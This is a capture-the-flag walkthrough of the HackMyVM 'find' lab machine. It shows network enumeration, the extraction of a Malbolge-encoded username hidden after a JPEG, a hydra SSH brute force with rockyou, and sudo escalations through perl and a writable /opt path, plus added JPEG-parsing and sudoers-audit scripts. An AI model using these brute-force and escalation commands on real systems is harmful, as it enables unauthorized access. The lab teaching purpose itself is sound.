HackMyVM-find-Walkthrough
城南花已开 Lv6

Information gathering

Routine scanning

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0c (Unknown: locally administered)
192.168.56.100 08:00:27:1c:21:55 (Unknown)
192.168.56.111 08:00:27:43:fe:8f (Unknown)    <- target IP

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.872 seconds (136.75 hosts/sec). 3 responded

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -p- -A 192.168.56.111 -oN .find
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-06 23:07 EDT
Nmap scan report for 192.168.56.111
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6e:f7:90:04:84:0d:cd:1e:5d:2e:da:b1:51:d9:bf:57 (RSA)
| 256 39:5a:66:38:f7:64:9a:94:dd:bc:b6:fb:f8:e7:3f:87 (ECDSA)
|_ 256 8c:26:e7:26:62:77:16:40:fb:b5:cf:a6:1c:e0:f6:9d (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:43:FE:8F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.49 ms 192.168.56.111

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds

A quick look with whatweb shows that port 80 is just the Apache default page.

Since the box is called find, the obvious next step is a directory scan.

feroxbuster did not turn up anything useful, only a pile of Apache manual pages: it recurses into /manual/ by default, so the documentation drowns out the real hits (running it with -n to disable recursion avoids that). Switching to gobuster found the interesting files right away.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.56.111 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x txt,jpg,zip,png,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.111
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,png,html,txt,jpg
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10701]
/cat.jpg (Status: 200) [Size: 35137]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.111/manual/]
/robots.txt (Status: 200) [Size: 13]
Progress: 29743 / 1245864 (2.39%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 29751 / 1245864 (2.39%)
===============================================================
Finished
===============================================================

There is a cat.jpg and a robots.txt, so let's take a look at both.

[image: contents of robots.txt]

Given the hint in robots.txt, cat.jpg most likely has something to do with the user account.

Download cat.jpg with wget first.

Running cat on it dumps the whole binary to the terminal, but at the very end there is a readable string that looks like some kind of encoding. (strings cat.jpg | tail or tail -c 300 cat.jpg shows the same thing without the noise. Bytes sitting after the JPEG end-of-image marker FF D9 are ignored by image viewers, which is why the picture still displays normally.) Now I had a lead but no idea where to start.

[image: the trailing string at the end of cat.jpg]

Later I looked at the image's EXIF data and saw the file source https://commons.wikimedia.org/wiki/File:Cat03.jpg (the Comment field below).

┌──(kali㉿kali)-[~]
└─$ exiftool cat.jpg
ExifTool Version Number : 12.76
File Name : cat.jpg
Directory : .
File Size : 35 kB
File Modification Date/Time : 2022:05:10 00:51:14-04:00
File Access Date/Time : 2024:07:06 23:55:49-04:00
File Inode Change Date/Time : 2024:07:06 23:55:42-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 72
Y Resolution : 72
Comment : File source: https://commons.wikimedia.org/wiki/File:Cat03.jpg
Image Width : 481
Image Height : 480
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 481x480
Megapixels : 0.231

That turned out to be of no use.

I sneaked a look at a write-up and found that the trailing string is a program in the Malbolge esoteric language.

Running it through an online Malbolge interpreter outputs missyred.

Brute-forcing SSH with hydra

That is most likely the user's login name, so let hydra brute-force SSH with it and rockyou.txt. hydra's own warning is worth following against SSH (-t 4), since sshd drops connections when too many run in parallel; here it did not matter because the password sits near the top of the wordlist.

The password fell out almost immediately.
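The "string at the end of the file" and the Comment that exiftool printed both live in places an image viewer never shows: the COM marker segment and the bytes after the EOI marker. The parser below is an added example, not code from the original post; it walks the JPEG marker segments and returns both, so an appended payload can be extracted exactly instead of read off a cat dump. The JPEG skeleton and the appended text are constructed inline (the box's real cat.jpg is not on this page); the COM text is the same source comment exiftool reported above.

```python
import struct

# Constructed sample: SOI, APP0/JFIF, a COM segment with the comment exiftool showed,
# a tiny SOS whose scan data contains a stuffed 0xFF 0x00, EOI, then appended bytes.
# APPENDED is a placeholder stand-in for the real payload, which is not on the page.
COMMENT = b"File source: https://commons.wikimedia.org/wiki/File:Cat03.jpg"
APPENDED = b"appended-after-EOI-placeholder"
SAMPLE_JPEG = (
    b"\xff\xd8"                                                                           # SOI
    + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"  # APP0
    + b"\xff\xfe" + struct.pack(">H", 2 + len(COMMENT)) + COMMENT                         # COM
    + b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"                    # SOS header
    + b"\x12\x34\xff\x00\x56"                                # entropy-coded data, FF 00 = stuffed byte
    + b"\xff\xd9"                                                                         # EOI
    + APPENDED
)


def parse_jpeg(data):
    """Walk the marker segments of a JPEG.

    Returns a dict with every COM (0xFFFE) comment, the offset of the EOI marker and
    whatever bytes follow EOI. Viewers stop at EOI, so trailing bytes are where appended
    data hides. eoi_offset is None and trailing is empty if the file has no EOI.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    comments = []
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected a marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                                   # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:                                   # EOI: the image ends here
            return {"comments": comments, "eoi_offset": pos, "trailing": data[pos + 2:]}
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:         # TEM / RSTn carry no length field
            pos += 2
            continue
        if pos + 4 > len(data):
            break
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]   # length includes its own 2 bytes
        payload = data[pos + 4:pos + 2 + seglen]
        if marker == 0xFE:
            comments.append(payload.decode("latin-1"))
        pos += 2 + seglen
        if marker == 0xDA:
            # Scan data follows the SOS header and has no length field. Skip until a real
            # marker: FF 00 is a stuffed data byte, FF D0..D7 are restart markers, FF FF is fill.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and nxt != 0xFF and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    return {"comments": comments, "eoi_offset": None, "trailing": b""}   # truncated file, no EOI


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        info = parse_jpeg(f.read())
    for c in info["comments"]:
        print("COM:", c)
    print("EOI at offset", info["eoi_offset"], "with", len(info["trailing"]), "trailing bytes")
    print(info["trailing"][:200])
```

Usage is python3 jpeg_trailer.py cat.jpg; the trailing bytes can then be written to a file and fed to a Malbolge interpreter as-is, with no risk of a terminal mangling the characters.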

┌──(kali㉿kali)-[~]
└─$ hydra -l missyred -P /usr/share/wordlists/rockyou.txt 192.168.56.111 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-07 01:46:20
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.111:22/
[22][ssh] host: 192.168.56.111 login: missyred password: iloveyou ### this is the password
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-07 01:46:35

Escalating from missyred

After logging in over SSH, it turns out missyred has a sudo rule.

missyred@find:/home/kings$ sudo -l
[sudo] password for missyred:
Matching Defaults entries for missyred on find:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User missyred may run the following commands on find:
(kings) /usr/bin/perl

The rest is straightforward: standard sudo escalation. perl can exec a shell, so sudo -u kings /usr/bin/perl lands us in a shell as kings, where user.txt in that home directory is readable. Note that the rule has no NOPASSWD tag, so sudo asks for missyred's own password (iloveyou); secure_path is pinned, but that does not matter because exec is given an absolute path.

missyred@find:/home/kings$ sudo -u kings /usr/bin/perl -e 'exec "/bin/bash";'
kings@find:~$ cat user.txt |base64
ZjRlNjkwZjYzOGMwMWJkOGExOWZiMTM0OWQ0MDUxOWMK

kings has a sudo rule of its own.

Escalating to root

Sudo escalation

kings@find:~$ sudo -l
Matching Defaults entries for kings on find:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kings may run the following commands on find:
(ALL) NOPASSWD: /opt/boom/boom.sh

However, that file does not exist, so create it by hand. This only works because /opt is writable by kings (the mkdir below succeeds without complaint); with a root-owned, mode 755 /opt, a rule pointing at a missing file would just make sudo fail with "command not found".

kings@find:~$ mkdir /opt/boom
kings@find:~$ echo "/bin/bash" >/opt/boom/boom.sh
kings@find:~$ chmod +x /opt/boom/boom.sh
kings@find:~$ sudo /opt/boom/boom.sh ## without -u, sudo runs the command as root
root@find:~# cat root.txt |base64
YzhhYWYwZjMxODllMDAwMDA2YzMwNWJiZmNiZWI3OTAK
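Both escalation steps come from the same class of misconfiguration: a sudoers rule that points at a path the user can either abuse (perl) or, worse, create (/opt/boom/boom.sh, which did not exist while /opt was writable by kings). The checker below is an added example, not anything from the original post. It parses sudo -l output (the kings output from above is embedded) and reports, for each command path, whether it exists and whether the file itself or its first existing ancestor is writable. The writability predicate is injectable so that demo() gives the same answer whoever runs it (root would see every path as writable); the temp tree built in demo() is a constructed stand-in for the box's filesystem.

```python
import os
import re
import tempfile

# Command lines in `sudo -l` output look like "(kings) /usr/bin/perl" or
# "(ALL) NOPASSWD: /opt/boom/boom.sh"; the Defaults lines never start with "(".
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)")

# `sudo -l` output for kings, copied from the box above.
SUDO_L_OUTPUT = r"""Matching Defaults entries for kings on find:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kings may run the following commands on find:
    (ALL) NOPASSWD: /opt/boom/boom.sh
    (kings) /usr/bin/perl
"""


def parse_sudo_rules(text):
    """Extract (runas, nopasswd, command path) from each command line of `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE.match(line)
        if not m or m.group("cmd") in ("ALL", "!ALL"):
            continue
        rules.append({
            "runas": m.group("runas"),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "path": m.group("cmd"),
        })
    return rules


def default_writable(path):
    return os.access(path, os.W_OK)


def audit_rule_path(path, root="/", writable=default_writable):
    """Classify one sudoers command path.

    A missing command whose first existing ancestor directory is writable can simply be
    created by the user (the boom.sh case). An existing command that is writable, or that
    lives in a writable directory, can be replaced. `root` lets the check run on a test tree.
    """
    full = os.path.join(root, path.lstrip("/"))
    probe = full
    while not os.path.lexists(probe):          # walk up to the first path component that exists
        parent = os.path.dirname(probe)
        if parent == probe:
            break
        probe = parent
    exists = probe == full
    rel = os.path.relpath(probe, root)          # report the ancestor as it would appear on the box
    first_existing = "/" if rel == "." else "/" + rel
    if not exists:
        risk = "missing, creatable by you" if writable(probe) else "missing"
    elif writable(full) or writable(os.path.dirname(full)):
        risk = "replaceable by you"
    else:
        risk = "ok"
    return {"path": path, "exists": exists, "first_existing": first_existing, "risk": risk}


def audit_sudo_l(text, root="/", writable=default_writable):
    return [dict(rule, **audit_rule_path(rule["path"], root, writable)) for rule in parse_sudo_rules(text)]


def demo():
    """Rebuild the box's layout in a temp tree: /opt exists, /opt/boom does not, /usr/bin/perl exists."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "opt"))
    os.makedirs(os.path.join(root, "usr", "bin"))
    open(os.path.join(root, "usr", "bin", "perl"), "w").close()

    def simulated_writable(path):
        # stand-in for os.access: on the box only /opt was writable by kings (assumption from the mkdir above)
        return os.path.basename(path) == "opt"

    return audit_sudo_l(SUDO_L_OUTPUT, root=root, writable=simulated_writable)


if __name__ == "__main__":
    import sys
    results = audit_sudo_l(sys.stdin.read()) if not sys.stdin.isatty() else demo()
    for r in results:
        tag = "NOPASSWD " if r["nopasswd"] else ""
        print(f"({r['runas']}) {tag}{r['path']}: {r['risk']} (first existing: {r['first_existing']})")
```

Run it on a live box with sudo -l | python3 sudo_audit.py. "ok" only means the path cannot be tampered with; whether the binary itself hands out a shell, as perl does here, is a separate GTFOBins-style check.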

And that's it. This box is fairly easy; the only hard part is that the string in the first step is impossible to guess, after which it is sudo escalation all the way.
